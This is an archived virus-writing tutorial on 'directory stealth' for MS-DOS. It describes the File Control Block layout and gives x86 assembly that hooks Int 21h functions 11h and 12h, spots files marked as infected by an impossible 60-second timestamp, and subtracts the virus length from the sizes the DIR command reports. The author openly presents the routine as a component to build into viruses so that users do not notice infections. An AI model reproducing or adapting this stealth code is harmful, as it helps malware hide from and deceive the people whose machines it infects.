💾 Archived View for spam.works › mirrors › textfiles › virus › dirstlth.txt captured on 2023-11-14 at 12:50:42.

View Raw

More Information

⬅️ Previous capture (2023-06-16)

-=-=-=-=-=-=-

Directory Stealth (FCB)
-----------------------------------------------------------------------------

Nowadays, a virus needs to use some kind of stealth technique in order to be
effective.  Memory stealth is something obviously needed in a virus, but in
this article we'll discuss another stealth method, simple and easy to put
into practice.

It's a problem, these days.  Users are informed about viruses and everyone is
astonished, imagining all these little bugs are getting into their machines. 
When a user sees his files start to grow for no apparent reason, he knows
something strange is happening.  And that strange 'thing' is almost certainly
a virus.

The technique we'll discuss in this article was developed precisely to avoid
just this situation: Directory Stealth.  We use this technique so that when
the user views his directory, he can't see the increase in file size which
results from a virus infection.

When the user types DIR, DOS functions 11h and 12h are called.  What we'll do
is to intercept these calls from our Int 21 handler.

Before going on, we need to talk about FCB (File control Block). This is a
table which DOS uses to work with files: open, close, etc. etc.  There are 2
types of FCBs.  One is NORMAL...  Its format is as follows:

offset   Size      Description
-----------------------------------------------------------------------------
00h       1        Drive (00=actual, 01=A:, 02=B:, 03=C: etc.)
01h       8        File name.  Space filled if less than 8 characters.
09h       3        File extension.
0Ch       2        Actual Block.  Points to the register block.
0Eh       2        Register size.
10h       4        File size in bytes.
14h       2        Date.
16h       2        Time.
18h       4        Reserved (MS doesn't tell us what it's used for)  ;)
1Ch       4        Equal to offset 10h, but that's the default value.
20h       1        Offset from actual register.
21h       4        Relative register.

There's also an EXTENDED FCB which is the same as the NORMAL FCB, except that
there are 7 additional bytes added to the beginning (before offset 0h of the
NORMAL FCB)

Offset  Size       Description
-----------------------------------------------------------------------------
-07h     1         contains the value 0FFh, which indicates its an extended 
                   FCB.
-06h     5         Reserved
-01h     1         Byte Attribute

When we ask for the DIR, Int 21 functions 11h & 12h are executed and the
system searches for the files based on the contents of the FCB.  If the
function ends satisfactorily, the contents of the FCB are copied to the DTA. 
What we are going to do is to edit the data copied to the DTA.

First, we add the code which will intercept the Int 21 11h and 12h functions:

Handler_21:
           ..
           ..
           cmp ah,11h           ; Did the user ask for a directory?
           je D_stealth         ; invoke stealth
           cmp ah,12h           ; Did the user ask for a directory?
           je D_stealth         ; invoke stealth
           ..
           ..

Let's go straight to the stealth code.  First we'll call the original Int 21
so the DTA is filled with the file data.

D_Stealth:
          pushf                          ; we simulate an
          call dword ptr cs:[Old21]      ; int 21h
          or al,al                       ; if AL=0 then all OK.
          jnz ERROR                      ; ag, there's been an error. ;)


What we do next is to obtain the DTA address so we can modify the data.     

          push ax bx es                  ; We store the registers we're using
          mov ah,2fh                     ; The DTA address is returned in
          int 21h                        ; ES:BX 

Now we must determine whether it's an extended or normal FCB, since the
offsets will be different.  So we see if the first byte is 0FFh: if it is,
it's extended.  Otherwise it's normal.  :) If it's extended, we'll add 7
bytes to its address.  These are of no use to us so we'll skip them so as to
get to the first datum the two (extended and normal) have in common.

         cmp byte ptr es:[BX],0ffh      ; Is the first byte FF?
         jne normal                     ; no, then it's a normal FCB
         add bx,7h                      ; If EXTENDED, add 7 bytes

Next, we must see if the file is infected, since if it is, we're not
interested in fixing anything.  For this we assume that we've marked infected
files by setting the seconds to 60, an impossible value.

normal: mov ax,es:[bx+17h]              ; We take the file's time from the
        and ax,1fh                      ; FCB and we check the seconds.
        xor al,1eh                      ; Do the seconds = 60?
                                        ; 1eh = 30 decimal, 30*2 = 60 sec.
                                        ; XOR = CMP, but quicker and better.
        jne no_infectado                ; not 60 = not infected..

The following code is executed ONLY if the file is infected.  We subtract the
size of the virus from the file size in order to obtain the original file
size..

        sub word ptr es:[bx+1dh],VIRLEN   ; Subtract virus size.
        sbb word ptr es:[bx+1fh],0        

Done!  Now we restore the registers we used and return from the int.

no_infectado: pop es bx ax              ; restore the registers
error:        iret                      ; return..

There we are.  It's really very easy and worthy of being included in a virus. 
The code is minimal and its services are truly useful..

Well, we've covered Directory Stealth, using the FCB.  But there is another
type of stealth, using HANDLE, which is the method used by Norton Commander,
PCTools and similar programs to look at files.  This method is much easier to
use than FCB.  In a forthcoming article we'll cover this method, which is
practically the same as FCB.

                                                            -  WM?  -